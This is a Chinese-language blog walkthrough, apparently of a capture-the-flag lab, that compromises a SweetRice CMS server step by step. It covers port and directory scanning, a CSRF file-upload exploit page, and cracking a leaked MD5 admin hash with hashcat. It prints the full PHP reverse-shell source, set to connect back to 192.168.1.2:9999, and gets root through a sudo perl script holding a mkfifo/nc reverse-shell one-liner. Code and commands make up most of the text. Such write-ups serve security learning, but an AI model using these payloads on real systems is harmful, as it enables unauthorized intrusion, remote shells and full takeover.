设置ip

export ip=target_ip

信息扫描

端口扫描

nmap -Pn $ip 发现80,22端口,80端口是一个默认apache的默认页面,html源码也没有提供任何线索

网站地址扫描

python3 dirsearch -u http://$ip 扫描发现了一个/content页面,页面提示是sweetrice CMS

exploit 搜索

searchsploit sweetrice,发现有几个exploit,有代码执行,文件上传,备份文件泄露等exploit

文件上传漏洞测试

searchsploit -m php/websapp/40700.html 复制exploit代码到本地文件40700.html

<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
# http://localhost/sweetrice/inc/ads/hacked.php

open ./40700.html 打开后发现需要管理员的账号密码才能登录上传文件

搜索爆破管理员账号密码

  • 尝试弱密码 admin,123456等 结果无效
  • 查看网站的其他文件内容,在exploit发现有个myql备份漏洞,访问下载备份后的文件,发现了管理的用户吗manager,密码42f749ade7f9e195bf475f37a44cafcb ,密码是个32位的hash值,可以爆破尝试一下
  • 在线网站揭秘hash值,CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.,揭秘出来结果为Password123
  • hashcat 揭秘hash值 hashcat -m 0 -o result.txt password_hash.txt /usr/share/wordlists/rockyou.txt,结果为Password123
  • 登录成功后重新执行 open ./40700.html,发现成功上传

生成php web shell

cat /usr/share/webshells/php/php-reverse-shell.php 复制输出的代码到之前的上传文件中,将ip和端口设置为自己的机器

<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.2';  // CHANGE THIS
$port = 9999;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?> 

&lt;/textarea&gt;
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
# http://localhost/sweetrice/inc/ads/hacked.php

linux 提权

sudo -l 发现有一个perl 程序可以执行,perl backup.sql,在backup.sql文件中写入netcat 反向shell
mkfifo /tmp/f; nc 192.168.1.2 9999 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f,成功拿到root权限

总结

覆盖了渗透测试的基本流程,难度较为简单。

最后修改:2021 年 09 月 13 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏